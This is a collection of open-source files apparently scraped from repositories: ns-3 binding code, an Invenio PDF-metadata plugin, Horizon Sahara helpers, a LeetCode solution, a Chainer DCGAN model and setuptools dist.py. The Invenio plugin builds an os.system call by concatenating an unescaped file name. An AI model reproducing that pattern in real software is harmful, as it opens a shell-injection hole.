[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## vector.h (module 'core'): ns3::Vector3D ns3::Vector3DValue::Get() const [member function]
cls.add_method('Get',
'ns3::Vector3D',
[],
is_const=True)
## vector.h (module 'core'): std::string ns3::Vector3DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## vector.h (module 'core'): void ns3::Vector3DValue::Set(ns3::Vector3D const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Vector3D const &', 'value')])
return
def register_Ns3AcousticModemEnergyModel_methods(root_module, cls):
## acoustic-modem-energy-model.h (module 'uan'): ns3::AcousticModemEnergyModel::AcousticModemEnergyModel(ns3::AcousticModemEnergyModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AcousticModemEnergyModel const &', 'arg0')])
## acoustic-modem-energy-model.h (module 'uan'): ns3::AcousticModemEnergyModel::AcousticModemEnergyModel() [constructor]
cls.add_constructor([])
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::ChangeState(int newState) [member function]
cls.add_method('ChangeState',
'void',
[param('int', 'newState')],
is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): int ns3::AcousticModemEnergyModel::GetCurrentState() const [member function]
cls.add_method('GetCurrentState',
'int',
[],
is_const=True)
## acoustic-modem-energy-model.h (module 'uan'): double ns3::AcousticModemEnergyModel::GetIdlePowerW() const [member function]
cls.add_method('GetIdlePowerW',
'double',
[],
is_const=True)
## acoustic-modem-energy-model.h (module 'uan'): ns3::Ptr<ns3::Node> ns3::AcousticModemEnergyModel::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True, is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): double ns3::AcousticModemEnergyModel::GetRxPowerW() const [member function]
cls.add_method('GetRxPowerW',
'double',
[],
is_const=True)
## acoustic-modem-energy-model.h (module 'uan'): double ns3::AcousticModemEnergyModel::GetSleepPowerW() const [member function]
cls.add_method('GetSleepPowerW',
'double',
[],
is_const=True)
## acoustic-modem-energy-model.h (module 'uan'): double ns3::AcousticModemEnergyModel::GetTotalEnergyConsumption() const [member function]
cls.add_method('GetTotalEnergyConsumption',
'double',
[],
is_const=True, is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): double ns3::AcousticModemEnergyModel::GetTxPowerW() const [member function]
cls.add_method('GetTxPowerW',
'double',
[],
is_const=True)
## acoustic-modem-energy-model.h (module 'uan'): static ns3::TypeId ns3::AcousticModemEnergyModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::HandleEnergyDepletion() [member function]
cls.add_method('HandleEnergyDepletion',
'void',
[],
is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetEnergyDepletionCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
cls.add_method('SetEnergyDepletionCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')])
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetEnergySource(ns3::Ptr<ns3::EnergySource> source) [member function]
cls.add_method('SetEnergySource',
'void',
[param('ns3::Ptr< ns3::EnergySource >', 'source')],
is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetIdlePowerW(double idlePowerW) [member function]
cls.add_method('SetIdlePowerW',
'void',
[param('double', 'idlePowerW')])
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetRxPowerW(double rxPowerW) [member function]
cls.add_method('SetRxPowerW',
'void',
[param('double', 'rxPowerW')])
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetSleepPowerW(double sleepPowerW) [member function]
cls.add_method('SetSleepPowerW',
'void',
[param('double', 'sleepPowerW')])
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetTxPowerW(double txPowerW) [member function]
cls.add_method('SetTxPowerW',
'void',
[param('double', 'txPowerW')])
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='private', is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): double ns3::AcousticModemEnergyModel::DoGetCurrentA() const [member function]
cls.add_method('DoGetCurrentA',
'double',
[],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3AddressChecker_methods(root_module, cls):
## address.h (module 'network'): ns3::AddressChecker::AddressChecker() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::AddressChecker::AddressChecker(ns3::AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AddressChecker const &', 'arg0')])
return
def register_Ns3AddressValue_methods(root_module, cls):
## address.h (module 'network'): ns3::AddressValue::AddressValue() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AddressValue const &', 'arg0')])
## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::Address const & value) [constructor]
cls.add_constructor([param('ns3::Address const &', 'value')])
## address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## address.h (module 'network'): bool ns3::AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## address.h (module 'network'): ns3::Address ns3::AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Address',
[],
is_const=True)
## address.h (module 'network'): std::string ns3::AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## address.h (module 'network'): void ns3::AddressValue::Set(ns3::Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Address const &', 'value')])
return
def register_functions(root_module):
module = root_module
## uan-tx-mode.h (module 'uan'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeUanModesListChecker() [free function]
module.add_function('MakeUanModesListChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
register_functions_ns3_internal(module.get_submodule('internal'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def register_functions_ns3_internal(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
|
gpl-2.0
|
inspirehep/invenio
|
modules/websubmit/lib/wsm_pdftk_plugin.py
|
35
|
7328
|
## This file is part of Invenio.
## Copyright (C) 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
WebSubmit Metadata Plugin - This is the plugin to update metadata from
PDF files.
Dependencies: pdftk
"""
__plugin_version__ = "WebSubmit File Metadata Plugin API 1.0"
import os
import shutil
import tempfile
from invenio.shellutils import run_shell_command
from invenio.bibdocfile import decompose_file
from invenio.config import CFG_PATH_PDFTK, CFG_TMPDIR
from invenio.websubmit_config import InvenioWebSubmitFileMetadataRuntimeError
if not CFG_PATH_PDFTK:
raise ImportError, "Path to PDFTK is not set in CFG_PATH_PDFTK"
def can_read_local(inputfile):
"""
Checks if inputfile is among metadata-readable file types
@param inputfile: path to the image
@type inputfile: string
@rtype: boolean
@return: True if file can be processed
"""
# Check file type (0 base, 1 name, 2 ext)
ext = decompose_file(inputfile)[2]
return ext.lower() in ['.pdf']
def can_write_local(inputfile):
"""
Checks if inputfile is among metadata-writable file types (pdf)
@param inputfile: path to the image
@type inputfile: string
@rtype: boolean
@return: True if file can be processed
"""
ext = os.path.splitext(inputfile)[1]
return ext.lower() in ['.pdf']
def read_metadata_local(inputfile, verbose):
"""
Metadata extraction from many kinds of files
@param inputfile: path to the image
@type inputfile: string
@param verbose: verbosity
@type verbose: int
@rtype: dict
@return: dictionary with metadata
"""
cmd = CFG_PATH_PDFTK + ' %s dump_data'
(exit_status, output_std, output_err) = \
run_shell_command(cmd, args=(inputfile,))
metadata_dict = {}
key = None
value = None
for metadata_line in output_std.splitlines():
if metadata_line.strip().startswith("InfoKey"):
key = metadata_line.split(':', 1)[1].strip()
elif metadata_line.strip().startswith("InfoValue"):
value = metadata_line.split(':', 1)[1].strip()
if key in ["ModDate", "CreationDate"]:
# FIXME: Interpret these dates?
try:
pass
#value = datetime.strptime(value, "D:%Y%m%d%H%M%S%Z")
except:
pass
if key:
metadata_dict[key] = value
key = None
else:
try:
custom_key, custom_value = metadata_line.split(':', 1)
metadata_dict[custom_key.strip()] = custom_value.strip()
except:
# Most probably not relevant line
pass
return metadata_dict
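# Illustrative sketch of the parsing above (the pdftk output is hypothetical; actual
# keys depend on the PDF): `pdftk file.pdf dump_data` prints lines such as
#
#   InfoKey: Title
#   InfoValue: Annual report
#   InfoKey: ModDate
#   InfoValue: D:20110301120000
#   NumberOfPages: 12
#
# and the loop folds them into roughly
#
#   {'Title': 'Annual report', 'ModDate': 'D:20110301120000', 'NumberOfPages': '12'}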
def write_metadata_local(inputfile, outputfile, metadata_dictionary, verbose):
"""
Metadata write method, takes the .pdf as input and creates a new
one with the new info.
@param inputfile: path to the pdf
@type inputfile: string
@param outputfile: path to the resulting pdf
@type outputfile: string
@param verbose: verbosity
@type verbose: int
@param metadata_dictionary: metadata information to update inputfile
@type metadata_dictionary: dict
"""
# Take the file name (0 base, 1 name, 2 ext)
filename = decompose_file(inputfile)[1]
# Print pdf metadata
if verbose > 1:
print 'Metadata information in the PDF file ' + filename + ': \n'
try:
os.system(CFG_PATH_PDFTK + ' ' + inputfile + ' dump_data')
except Exception:
print 'Problem with inputfile to PDFTK'
# Info file for pdftk
(fd, path_to_info) = tempfile.mkstemp(prefix="wsm_pdf_plugin_info_", \
dir=CFG_TMPDIR)
os.close(fd)
file_in = open(path_to_info, 'w')
if verbose > 5:
print "Saving PDFTK info file to %s" % path_to_info
# User interaction to form the info file
# Main Case: Dictionary received through option -d
if metadata_dictionary != {}:
for tag in metadata_dictionary:
line = 'InfoKey: ' + tag + '\nInfoValue: ' + \
metadata_dictionary[tag] + '\n'
if verbose > 0:
print line
file_in.writelines(line)
else:
data_modified = False
user_input = 'user_input'
print "Entering interactive mode. Choose what you want to do:"
while (user_input):
if not data_modified:
try:
user_input = raw_input('[w]rite / [q]uit\n')
except:
print "Aborting"
return
else:
try:
user_input = raw_input('[w]rite / [q]uit and apply / [a]bort \n')
except:
print "Aborting"
return
if user_input == 'q':
if not data_modified:
return
break
elif user_input == 'w':
try:
tag = raw_input('Tag to update:\n')
value = raw_input('With value:\n')
except:
print "Aborting"
return
# Write to info file
line = 'InfoKey: ' + tag + '\nInfoValue: ' + value + '\n'
data_modified = True
file_in.writelines(line)
elif user_input == 'a':
return
else:
print "Invalid option: "
file_in.close()
(fd, pdf_temp_path) = tempfile.mkstemp(prefix="wsm_pdf_plugin_pdf_", \
dir=CFG_TMPDIR)
os.close(fd)
# Now we call pdftk tool to update the info on a pdf
#try:
cmd_pdftk = '%s %s update_info %s output %s'
(exit_status, output_std, output_err) = \
run_shell_command(cmd_pdftk,
args=(CFG_PATH_PDFTK, inputfile,
path_to_info, pdf_temp_path))
if verbose > 5:
print output_std, output_err
if os.path.exists(pdf_temp_path):
# Move to final destination if exist
try:
shutil.move(pdf_temp_path, outputfile)
except Exception, err:
raise InvenioWebSubmitFileMetadataRuntimeError("Could not move %s to %s" % \
(pdf_temp_path, outputfile))
else:
# Something bad happened
raise InvenioWebSubmitFileMetadataRuntimeError("Could not update metadata " + output_err)
|
gpl-2.0
|
dan1/horizon-proto
|
openstack_dashboard/contrib/sahara/content/data_processing/utils/workflow_helpers.py
|
30
|
10029
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from django.utils.translation import ugettext_lazy as _
from horizon import forms
from horizon import workflows
from openstack_dashboard.api import network
LOG = logging.getLogger(__name__)
class Parameter(object):
def __init__(self, config):
self.name = config['name']
self.description = config.get('description', "No description")
self.required = not config['is_optional']
self.default_value = config.get('default_value', None)
self.initial_value = self.default_value
self.param_type = config['config_type']
self.priority = int(config.get('priority', 2))
self.choices = config.get('config_values', None)
def build_control(parameter):
attrs = {"priority": parameter.priority,
"placeholder": parameter.default_value}
if parameter.param_type == "string":
return forms.CharField(
widget=forms.TextInput(attrs=attrs),
label=parameter.name,
required=(parameter.required and
parameter.default_value is None),
help_text=parameter.description,
initial=parameter.initial_value)
if parameter.param_type == "int":
return forms.IntegerField(
widget=forms.TextInput(attrs=attrs),
label=parameter.name,
required=parameter.required,
help_text=parameter.description,
initial=parameter.initial_value)
elif parameter.param_type == "bool":
return forms.BooleanField(
widget=forms.CheckboxInput(attrs=attrs),
label=parameter.name,
required=False,
initial=parameter.initial_value,
help_text=parameter.description)
elif parameter.param_type == "dropdown":
return forms.ChoiceField(
widget=forms.Select(attrs=attrs),
label=parameter.name,
required=parameter.required,
choices=parameter.choices,
help_text=parameter.description)
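# A minimal usage sketch (the config dict is hypothetical, but uses exactly the keys
# Parameter.__init__ reads above):
#
#   param = Parameter({'name': 'dfs.replication',
#                      'description': 'Default block replication.',
#                      'is_optional': True,
#                      'config_type': 'int',
#                      'default_value': '3',
#                      'priority': 2})
#   field = build_control(param)  # -> forms.IntegerField, placeholder "3", not required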
def _create_step_action(name, title, parameters, advanced_fields=None,
service=None):
class_fields = {}
contributes_field = ()
for param in parameters:
field_name = "CONF:" + service + ":" + param.name
contributes_field += (field_name,)
class_fields[field_name] = build_control(param)
if advanced_fields is not None:
for ad_field_name, ad_field_value in advanced_fields:
class_fields[ad_field_name] = ad_field_value
action_meta = type('Meta', (object, ),
dict(help_text_template=("project"
"/data_processing."
"nodegroup_templates/"
"_fields_help.html")))
class_fields['Meta'] = action_meta
action = type(str(title),
(workflows.Action,),
class_fields)
step_meta = type('Meta', (object,), dict(name=title))
step = type(str(name),
(workflows.Step, ),
dict(name=name,
process_name=name,
action_class=action,
contributes=contributes_field,
Meta=step_meta))
return step
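# Sketch of the dynamically built step (continuing the hypothetical parameter above):
# the generated Action gets one form field per parameter, keyed "CONF:<service>:<name>",
# and the returned Step contributes those keys to the workflow context, e.g.
#
#   step = _create_step_action('HDFSStep', title='HDFS Parameters',
#                              parameters=[param], service='HDFS')
#   # -> step.contributes == ('CONF:HDFS:dfs.replication',)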
def build_node_group_fields(action, name, template, count, serialized=None):
action.fields[name] = forms.CharField(
label=_("Name"),
widget=forms.TextInput())
action.fields[template] = forms.CharField(
label=_("Node group cluster"),
widget=forms.HiddenInput())
action.fields[count] = forms.IntegerField(
label=_("Count"),
min_value=0,
widget=forms.HiddenInput())
action.fields[serialized] = forms.CharField(
widget=forms.HiddenInput())
def parse_configs_from_context(context, defaults):
configs_dict = dict()
for key, val in context.items():
if str(key).startswith("CONF"):
key_split = str(key).split(":")
service = key_split[1]
config = key_split[2]
if service not in configs_dict:
configs_dict[service] = dict()
if (val is None or
unicode(defaults[service][config]) == unicode(val)):
continue
configs_dict[service][config] = val
return configs_dict
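# For example (hypothetical values), a context of
#
#   {'CONF:HDFS:dfs.replication': '2',
#    'CONF:HDFS:dfs.block.size': '134217728',
#    'cluster_name': 'demo'}
#
# with defaults {'HDFS': {'dfs.replication': '3', 'dfs.block.size': '134217728'}}
# collapses to {'HDFS': {'dfs.replication': '2'}}: non-"CONF" keys are skipped and
# values equal to their defaults are dropped.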
def get_security_groups(request, security_group_ids):
security_groups = []
for group in security_group_ids or []:
try:
security_groups.append(network.security_group_get(
request, group))
except Exception:
LOG.info(_('Unable to retrieve security group %(group)s.') %
{'group': group})
security_groups.append({'name': group})
return security_groups
def get_plugin_and_hadoop_version(request):
plugin_name = None
hadoop_version = None
if request.REQUEST.get("plugin_name"):
plugin_name = request.REQUEST["plugin_name"]
hadoop_version = request.REQUEST["hadoop_version"]
return (plugin_name, hadoop_version)
def clean_node_group(node_group):
node_group_copy = dict((key, value)
for key, value in node_group.items() if value)
for key in ["id", "created_at", "updated_at"]:
if key in node_group_copy:
node_group_copy.pop(key)
return node_group_copy
class PluginAndVersionMixin(object):
def _generate_plugin_version_fields(self, sahara):
plugins = sahara.plugins.list()
plugin_choices = [(plugin.name, plugin.title) for plugin in plugins]
self.fields["plugin_name"] = forms.ChoiceField(
label=_("Plugin Name"),
choices=plugin_choices,
widget=forms.Select(attrs={"class": "plugin_name_choice"}))
for plugin in plugins:
field_name = plugin.name + "_version"
choice_field = forms.ChoiceField(
label=_("Version"),
choices=[(version, version) for version in plugin.versions],
widget=forms.Select(
attrs={"class": "plugin_version_choice "
+ field_name + "_choice"})
)
self.fields[field_name] = choice_field
class PatchedDynamicWorkflow(workflows.Workflow):
"""Overrides Workflow to fix its issues."""
def _ensure_dynamic_exist(self):
if not hasattr(self, 'dynamic_steps'):
self.dynamic_steps = list()
def _register_step(self, step):
# Use that method instead of 'register' to register step.
# Note that a step could be registered in descendant class constructor
# only before this class constructor is invoked.
self._ensure_dynamic_exist()
self.dynamic_steps.append(step)
def _order_steps(self):
# overrides method of Workflow
# crutch to fix https://bugs.launchpad.net/horizon/+bug/1196717
# and another not filed issue that dynamic creation of tabs is
# not thread safe
self._ensure_dynamic_exist()
self._registry = dict([(step, step(self))
for step in self.dynamic_steps])
return list(self.default_steps) + self.dynamic_steps
class ServiceParametersWorkflow(PatchedDynamicWorkflow):
"""Base class for Workflows having services tabs with parameters."""
def _populate_tabs(self, general_parameters, service_parameters):
# Populates tabs for 'general' and service parameters
# Also populates defaults and initial values
self.defaults = dict()
self._init_step('general', 'General Parameters', general_parameters)
for service, parameters in service_parameters.items():
self._init_step(service, service + ' Parameters', parameters)
def _init_step(self, service, title, parameters):
if not parameters:
return
self._populate_initial_values(service, parameters)
step = _create_step_action(service, title=title, parameters=parameters,
service=service)
self.defaults[service] = dict()
for param in parameters:
self.defaults[service][param.name] = param.default_value
self._register_step(step)
def _set_configs_to_copy(self, configs):
self.configs_to_copy = configs
def _populate_initial_values(self, service, parameters):
if not hasattr(self, 'configs_to_copy'):
return
configs = self.configs_to_copy
for param in parameters:
if (service in configs and
param.name in configs[service]):
param.initial_value = configs[service][param.name]
class StatusFormatMixin(workflows.Workflow):
def __init__(self, request, context_seed, entry_point, *args, **kwargs):
super(StatusFormatMixin, self).__init__(request,
context_seed,
entry_point,
*args,
**kwargs)
def format_status_message(self, message):
error_description = getattr(self, 'error_description', None)
if error_description:
return error_description
else:
return message % self.context[self.name_property]
|
apache-2.0
|
kingsamchen/Eureka
|
crack-data-structures-and-algorithms/leetcode/find_minimum_in_rotated_sorted_array_II_q154.py
|
1
|
1154
|
# -*- coding: utf-8 -*-
# 0xCCCCCCCC
# Like Q153 but with possible duplicates.
def find_min(nums):
"""
:type nums: List[int]
:rtype: int
"""
l, r = 0, len(nums) - 1
while l < r and nums[l] >= nums[r]:
m = (l + r) // 2
if nums[m] > nums[r]:
l = m + 1
elif nums[m] < nums[r]:
r = m
else:
# When nums[m] == nums[r], only a few cases remain.
# Try to prune as many of them as possible.
if nums[m] < nums[l]:
l += 1
r = m
# nums[l] = nums[m] = nums[r]
# Rule out one of the duplicate elements; the array's properties are preserved.
else:
r -= 1
return nums[l]
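# Note: the `r -= 1` fallback shrinks the window by only one element, so heavily
# duplicated input (e.g. [2, 2, 2, 2]) degrades the search to O(n); with distinct
# elements the binary search stays O(log n), as in Q153.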
nums = [4,5,6,7,0,1,2]
print(find_min(nums))
nums = [3,4,5,1,2]
print(find_min(nums))
nums = [5,1,2]
print(find_min(nums))
nums = [5,2]
print(find_min(nums))
nums = [2,3,4,5,1]
print(find_min(nums))
nums = [1, 3, 5]
print(find_min(nums))
nums = [2,2,2,0,1]
print(find_min(nums))
nums = [3,3,1,3]
print(find_min(nums))
nums = [3,1,3,3,3]
print(find_min(nums))
nums = [4,4,4,4,4,4]
print(find_min(nums))
|
mit
|
delta2323/chainer
|
examples/dcgan/net.py
|
5
|
3623
|
#!/usr/bin/env python
from __future__ import print_function
import numpy
import chainer
from chainer import cuda
import chainer.functions as F
import chainer.links as L
def add_noise(h, sigma=0.2):
xp = cuda.get_array_module(h.data)
if chainer.config.train:
return h + sigma * xp.random.randn(*h.shape)
else:
return h
class Generator(chainer.Chain):
def __init__(self, n_hidden, bottom_width=4, ch=512, wscale=0.02):
super(Generator, self).__init__()
self.n_hidden = n_hidden
self.ch = ch
self.bottom_width = bottom_width
with self.init_scope():
w = chainer.initializers.Normal(wscale)
self.l0 = L.Linear(self.n_hidden, bottom_width * bottom_width * ch,
initialW=w)
self.dc1 = L.Deconvolution2D(ch, ch // 2, 4, 2, 1, initialW=w)
self.dc2 = L.Deconvolution2D(ch // 2, ch // 4, 4, 2, 1, initialW=w)
self.dc3 = L.Deconvolution2D(ch // 4, ch // 8, 4, 2, 1, initialW=w)
self.dc4 = L.Deconvolution2D(ch // 8, 3, 3, 1, 1, initialW=w)
self.bn0 = L.BatchNormalization(bottom_width * bottom_width * ch)
self.bn1 = L.BatchNormalization(ch // 2)
self.bn2 = L.BatchNormalization(ch // 4)
self.bn3 = L.BatchNormalization(ch // 8)
def make_hidden(self, batchsize):
return numpy.random.uniform(-1, 1, (batchsize, self.n_hidden, 1, 1))\
.astype(numpy.float32)
def __call__(self, z):
h = F.reshape(F.relu(self.bn0(self.l0(z))),
(len(z), self.ch, self.bottom_width, self.bottom_width))
h = F.relu(self.bn1(self.dc1(h)))
h = F.relu(self.bn2(self.dc2(h)))
h = F.relu(self.bn3(self.dc3(h)))
x = F.sigmoid(self.dc4(h))
return x
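# Shape sketch with the default bottom_width=4: l0 + reshape yields (N, ch, 4, 4);
# dc1-dc3 (ksize=4, stride=2, pad=1) each double the spatial size, 4 -> 8 -> 16 -> 32,
# and dc4 (ksize=3, stride=1, pad=1) keeps it, so the generator emits (N, 3, 32, 32)
# images squashed into [0, 1] by the sigmoid.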
class Discriminator(chainer.Chain):
def __init__(self, bottom_width=4, ch=512, wscale=0.02):
w = chainer.initializers.Normal(wscale)
super(Discriminator, self).__init__()
with self.init_scope():
self.c0_0 = L.Convolution2D(3, ch // 8, 3, 1, 1, initialW=w)
self.c0_1 = L.Convolution2D(ch // 8, ch // 4, 4, 2, 1, initialW=w)
self.c1_0 = L.Convolution2D(ch // 4, ch // 4, 3, 1, 1, initialW=w)
self.c1_1 = L.Convolution2D(ch // 4, ch // 2, 4, 2, 1, initialW=w)
self.c2_0 = L.Convolution2D(ch // 2, ch // 2, 3, 1, 1, initialW=w)
self.c2_1 = L.Convolution2D(ch // 2, ch // 1, 4, 2, 1, initialW=w)
self.c3_0 = L.Convolution2D(ch // 1, ch // 1, 3, 1, 1, initialW=w)
self.l4 = L.Linear(bottom_width * bottom_width * ch, 1, initialW=w)
self.bn0_1 = L.BatchNormalization(ch // 4, use_gamma=False)
self.bn1_0 = L.BatchNormalization(ch // 4, use_gamma=False)
self.bn1_1 = L.BatchNormalization(ch // 2, use_gamma=False)
self.bn2_0 = L.BatchNormalization(ch // 2, use_gamma=False)
self.bn2_1 = L.BatchNormalization(ch // 1, use_gamma=False)
self.bn3_0 = L.BatchNormalization(ch // 1, use_gamma=False)
def __call__(self, x):
h = add_noise(x)
h = F.leaky_relu(add_noise(self.c0_0(h)))
h = F.leaky_relu(add_noise(self.bn0_1(self.c0_1(h))))
h = F.leaky_relu(add_noise(self.bn1_0(self.c1_0(h))))
h = F.leaky_relu(add_noise(self.bn1_1(self.c1_1(h))))
h = F.leaky_relu(add_noise(self.bn2_0(self.c2_0(h))))
h = F.leaky_relu(add_noise(self.bn2_1(self.c2_1(h))))
h = F.leaky_relu(add_noise(self.bn3_0(self.c3_0(h))))
return self.l4(h)
|
mit
|
rossgoodwin/musapaedia
|
musapaedia/muse/lib/python2.7/site-packages/setuptools/dist.py
|
16
|
35330
|
__all__ = ['Distribution']
import re
import os
import sys
import warnings
import numbers
import distutils.log
import distutils.core
import distutils.cmd
import distutils.dist
from distutils.core import Distribution as _Distribution
from distutils.errors import (DistutilsOptionError, DistutilsPlatformError,
DistutilsSetupError)
from setuptools.depends import Require
from setuptools.compat import basestring, PY2
from setuptools import windows_support
import pkg_resources
packaging = pkg_resources.packaging
def _get_unpatched(cls):
"""Protect against re-patching the distutils if reloaded
Also ensures that no other distutils extension monkeypatched the distutils
first.
"""
while cls.__module__.startswith('setuptools'):
cls, = cls.__bases__
if not cls.__module__.startswith('distutils'):
raise AssertionError(
"distutils has already been patched by %r" % cls
)
return cls
_Distribution = _get_unpatched(_Distribution)
def _patch_distribution_metadata_write_pkg_info():
"""
Workaround issue #197 - Python 3 prior to 3.2.2 uses an environment-local
encoding to save the pkg_info. Monkey-patch its write_pkg_info method to
correct this undesirable behavior.
"""
environment_local = (3,) <= sys.version_info[:3] < (3, 2, 2)
if not environment_local:
return
# from Python 3.4
def write_pkg_info(self, base_dir):
"""Write the PKG-INFO file into the release tree.
"""
with open(os.path.join(base_dir, 'PKG-INFO'), 'w',
encoding='UTF-8') as pkg_info:
self.write_pkg_file(pkg_info)
distutils.dist.DistributionMetadata.write_pkg_info = write_pkg_info
_patch_distribution_metadata_write_pkg_info()
sequence = tuple, list
def check_importable(dist, attr, value):
try:
ep = pkg_resources.EntryPoint.parse('x='+value)
assert not ep.extras
except (TypeError,ValueError,AttributeError,AssertionError):
raise DistutilsSetupError(
"%r must be importable 'module:attrs' string (got %r)"
% (attr,value)
)
def assert_string_list(dist, attr, value):
"""Verify that value is a string list or None"""
try:
assert ''.join(value)!=value
except (TypeError,ValueError,AttributeError,AssertionError):
raise DistutilsSetupError(
"%r must be a list of strings (got %r)" % (attr,value)
)
def check_nsp(dist, attr, value):
"""Verify that namespace packages are valid"""
assert_string_list(dist,attr,value)
for nsp in value:
if not dist.has_contents_for(nsp):
raise DistutilsSetupError(
"Distribution contains no modules or packages for " +
"namespace package %r" % nsp
)
if '.' in nsp:
parent = '.'.join(nsp.split('.')[:-1])
if parent not in value:
distutils.log.warn(
"WARNING: %r is declared as a package namespace, but %r"
" is not: please correct this in setup.py", nsp, parent
)
def check_extras(dist, attr, value):
"""Verify that extras_require mapping is valid"""
try:
for k,v in value.items():
if ':' in k:
k,m = k.split(':',1)
if pkg_resources.invalid_marker(m):
raise DistutilsSetupError("Invalid environment marker: "+m)
list(pkg_resources.parse_requirements(v))
except (TypeError,ValueError,AttributeError):
raise DistutilsSetupError(
"'extras_require' must be a dictionary whose values are "
"strings or lists of strings containing valid project/version "
"requirement specifiers."
)
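# For illustration, a mapping that passes this check (names are hypothetical); the
# "name:marker" form exercises the environment-marker branch above:
#
#   extras_require = {
#       'reST': ['docutils>=0.3'],
#       'tests:python_version=="2.6"': ['unittest2'],
#   }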
def assert_bool(dist, attr, value):
"""Verify that value is True, False, 0, or 1"""
if bool(value) != value:
raise DistutilsSetupError(
"%r must be a boolean value (got %r)" % (attr,value)
)
def check_requirements(dist, attr, value):
"""Verify that install_requires is a valid requirements list"""
try:
list(pkg_resources.parse_requirements(value))
except (TypeError,ValueError):
raise DistutilsSetupError(
"%r must be a string or list of strings "
"containing valid project/version requirement specifiers" % (attr,)
)
def check_entry_points(dist, attr, value):
"""Verify that entry_points map is parseable"""
try:
pkg_resources.EntryPoint.parse_map(value)
except ValueError:
e = sys.exc_info()[1]
raise DistutilsSetupError(e)
def check_test_suite(dist, attr, value):
if not isinstance(value,basestring):
raise DistutilsSetupError("test_suite must be a string")
def check_package_data(dist, attr, value):
"""Verify that value is a dictionary of package names to glob lists"""
if isinstance(value,dict):
for k,v in value.items():
if not isinstance(k,str): break
try: iter(v)
except TypeError:
break
else:
return
raise DistutilsSetupError(
attr+" must be a dictionary mapping package names to lists of "
"wildcard patterns"
)
def check_packages(dist, attr, value):
for pkgname in value:
if not re.match(r'\w+(\.\w+)*', pkgname):
distutils.log.warn(
"WARNING: %r not a valid package name; please use only"
".-separated package names in setup.py", pkgname
)
